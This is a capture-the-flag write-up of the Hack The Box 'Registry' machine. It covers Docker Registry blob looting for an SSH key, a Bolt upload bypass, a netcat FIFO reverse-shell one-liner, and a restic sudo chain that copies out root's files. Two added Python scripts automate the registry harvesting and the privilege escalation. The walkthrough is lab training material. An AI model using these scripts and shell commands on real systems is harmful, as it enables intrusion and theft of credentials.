[HTB] Registry — Write-up

Recon

Nmap

$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.159

Initial Foothold (Docker Registry)

HTTPS (443/TCP)

Dirsearch

$ dirsearch.py -u https://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt,html

Docker Registry API Exploitation

### Downloading Each Blob
https://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
### Extracting Each Blob (each layer blob is a gzipped tar, so tar handles it directly)
$ tar -xvf sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b

User Access #1 (bolt)

### Password for Encrypted Private Key
/etc/profile.d/01-ssh.sh
### Username 
/root/.ssh/config
### Encrypted Private Key
/root/.ssh/id_rsa
### SSH as "bolt"
$ ssh -i id_rsa bolt@10.10.10.159
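Pulling the image by hand, one blob URL at a time, gets tedious. The script below is an added example for this write-up (not the author's tooling): it walks the standard Registry v2 endpoints (`/v2/_catalog`, `/v2/<repo>/tags/list`, `/v2/<repo>/manifests/<tag>`, `/v2/<repo>/blobs/<digest>`), saves every layer, and lists the files inside each layer that are worth reading first, which is how the SSH key, its passphrase script and the `config` file above turn up. The base URL, repository, tag, output directory and the optional basic-auth pair are inputs you supply; the `latest` tag in the usage line is an assumption, check `tags/list` first.

```python
"""Enumerate a Docker Registry v2 API and pull every layer of one image.

Added example for this write-up; it is not the author's tooling. It assumes the
registry answers the standard v2 endpoints. Base URL, repo, tag, output dir and
the optional (user, password) basic-auth pair are caller-supplied; nothing here
is taken from the box beyond the endpoint layout.
"""
import base64
import io
import json
import os
import ssl
import sys
import tarfile
import urllib.request

MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"

# Paths inside a pulled layer worth reading first: SSH material and the
# profile.d hooks where this box keeps the key passphrase.
INTERESTING = (".ssh/", "profile.d/", ".bash_history", "id_rsa")


def layer_digests(manifest):
    """Return the layer digests of a schema-2 manifest (schema-1 as fallback)."""
    if "layers" in manifest:
        return [layer["digest"] for layer in manifest["layers"]]
    return [fs["blobSum"] for fs in manifest.get("fsLayers", [])]


def interesting_members(layer_bytes):
    """Sorted file paths inside a (gzip or plain) layer tar that match INTERESTING."""
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        return sorted(m.name for m in tar.getmembers()
                      if m.isfile() and any(k in m.name for k in INTERESTING))


class Registry:
    def __init__(self, base_url, auth=None, verify_tls=True):
        self.base = base_url.rstrip("/")
        self.headers = {"Accept": MANIFEST_V2}
        if auth:  # assumption: (user, password) for HTTP basic auth, if the registry wants it
            token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
            self.headers["Authorization"] = f"Basic {token}"
        self.ctx = ssl.create_default_context()
        if not verify_tls:  # lab registries usually sit behind a self-signed cert
            self.ctx.check_hostname = False
            self.ctx.verify_mode = ssl.CERT_NONE

    def _get(self, path):
        req = urllib.request.Request(self.base + path, headers=self.headers)
        with urllib.request.urlopen(req, context=self.ctx) as resp:
            return resp.read()

    def catalog(self):
        return json.loads(self._get("/v2/_catalog"))["repositories"]

    def tags(self, repo):
        return json.loads(self._get(f"/v2/{repo}/tags/list"))["tags"]

    def manifest(self, repo, tag):
        return json.loads(self._get(f"/v2/{repo}/manifests/{tag}"))

    def pull_layers(self, repo, tag, outdir):
        """Save every blob under outdir, print files worth opening, return saved paths."""
        os.makedirs(outdir, exist_ok=True)
        saved = []
        for digest in layer_digests(self.manifest(repo, tag)):
            blob = self._get(f"/v2/{repo}/blobs/{digest}")
            dest = os.path.join(outdir, digest.replace(":", "_") + ".tar.gz")
            with open(dest, "wb") as fh:
                fh.write(blob)
            saved.append(dest)
            for name in interesting_members(blob):
                print(f"{digest[:19]}  {name}")
        return saved


if __name__ == "__main__":
    # usage: python3 registry_pull.py https://docker.registry.htb bolt-image latest ./layers
    url, repo, tag, outdir = sys.argv[1:5]
    reg = Registry(url, verify_tls=False)
    print("repositories:", reg.catalog())
    print("tags:", reg.tags(repo))
    reg.pull_layers(repo, tag, outdir)
```

The `Accept` header matters: without it many registries return a schema-1 manifest, which is why `layer_digests` understands both shapes. Layers are applied in manifest order, so a file that looks deleted in a later layer (a whiteout entry) can still be present in an earlier blob.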

user.txt

User Access #2 (bolt → www-data)

Bolt App — Admin Password Recovery

Bolt App — Admin Login

Bolt App — File Upload File-type Bypass

Accessing Config.yml File

Bolt App — Reverse Shell

### Netcat Reverse Shell
# FIFO-based shell back to a listener on the box itself (localhost:9002),
# started from the bolt SSH session; /bin/sh reads from the fifo and nc writes into it.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 9002 >/tmp/f

Root Access

Restic (Backup Solution)

### Creating Repository
bolt@bolt:/tmp$ restic init --repo /tmp/restic
*Enter any password you want. I used "bigb0ss."
### Moving rest-server binary
$ sftp -i id_rsa bolt@10.10.10.159
sftp> put rest-server-0.9.7-linux-amd64
### Running rest-server
bolt@bolt:/tmp$ chmod +x rest-server-0.9.7-linux-amd64
bolt@bolt:/tmp$ ./rest-server-0.9.7-linux-amd64
### Backup root.txt with sudo
www-data@bolt:/tmp$ sudo restic backup -r rest:http://127.0.0.1:8000 /root/root.txt
### Listing Snapshots (*No sudo required)
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 snapshots
### Restoring the Snapshots (*No sudo required)
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 restore 680634a8 --target /tmp/ting
### Getting Root SSH Keys
www-data@bolt:/tmp$ sudo restic backup -r rest:http://127.0.0.1:8000 /root/.ssh/id_rsa
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 snapshots
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 restore ec881c80 --target /tmp/ssh
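The whole chain above is: privileged `backup` into a repository we control, unprivileged `snapshots` and `restore` out of it. The script below is an added example for this write-up, not the author's commands, and runs that chain for any root-only path. It assumes the rest-server from the steps above is already listening on 127.0.0.1:8000, that the repository password chosen at `restic init` is in a file the low-privileged user can read (`/tmp/restic.pw` is a hypothetical path), and that the sudo rule allowing `restic backup -r rest:...` tolerates the extra `-p` flag; if it does not, drop `-p` and let the privileged backup prompt for the password as the manual steps do.

```python
"""Run the restic sudo chain from the steps above as one script.

Added example for this write-up, not the author's commands. Assumes a
rest-server on 127.0.0.1:8000, a readable repo password file (hypothetical
path below) and a sudo rule that accepts `restic backup -r rest:... -p ...`.
"""
import json
import subprocess
import sys
from datetime import datetime

REPO = "rest:http://127.0.0.1:8000"
PASSWORD_FILE = "/tmp/restic.pw"  # hypothetical; holds the password given to `restic init`

# Constructed sample of `restic snapshots --json` output; the two real ids
# mirror the write-up, the older one is made up.
SAMPLE_SNAPSHOTS = json.dumps([
    {"time": "2019-10-21T09:00:00.000000000Z", "paths": ["/root/root.txt"],
     "short_id": "d0d0d0d0"},
    {"time": "2019-10-21T10:00:00.123456789Z", "paths": ["/root/root.txt"],
     "short_id": "680634a8"},
    {"time": "2019-10-21T10:05:00.000000000Z", "paths": ["/root/.ssh/id_rsa"],
     "short_id": "ec881c80"},
])


def restic_argv(subcommand, *args, sudo=False):
    """argv for one restic call; only `backup` needs (and is allowed) sudo.

    The password file is passed explicitly because sudo resets the
    environment, so RESTIC_PASSWORD would not reach the privileged call.
    """
    argv = ["restic", subcommand, "-r", REPO, "-p", PASSWORD_FILE, *args]
    return ["sudo", *argv] if sudo else argv


def newest_snapshot(snapshots_json, path):
    """short_id of the newest snapshot whose paths include `path`."""
    def when(snap):
        return datetime.fromisoformat(snap["time"][:19])  # drop nanoseconds and offset
    matches = [s for s in json.loads(snapshots_json) if path in s["paths"]]
    if not matches:
        raise LookupError(f"no snapshot contains {path}")
    return max(matches, key=when)["short_id"]


def run(argv):
    return subprocess.run(argv, check=True, capture_output=True, text=True).stdout


def exfiltrate(path, target):
    """Back up a root-only file through sudo, then restore it without sudo."""
    run(restic_argv("backup", path, sudo=True))
    snap = newest_snapshot(run(restic_argv("snapshots", "--json")), path)
    run(restic_argv("restore", snap, "--target", target))
    return target.rstrip("/") + path  # restic recreates the absolute path under target


if __name__ == "__main__":
    # usage: python3 restic_pull.py /root/.ssh/id_rsa /tmp/ssh
    print(exfiltrate(sys.argv[1], sys.argv[2]))
```

The restored file keeps its original path under the target directory, so `/root/.ssh/id_rsa` lands at `/tmp/ssh/root/.ssh/id_rsa`, which is where the manual `restore` above puts it too. The only privileged step is the backup; everything that reads the data back runs as www-data, which is the whole problem with a sudo rule on `restic backup` pointed at a repository the user controls.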

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
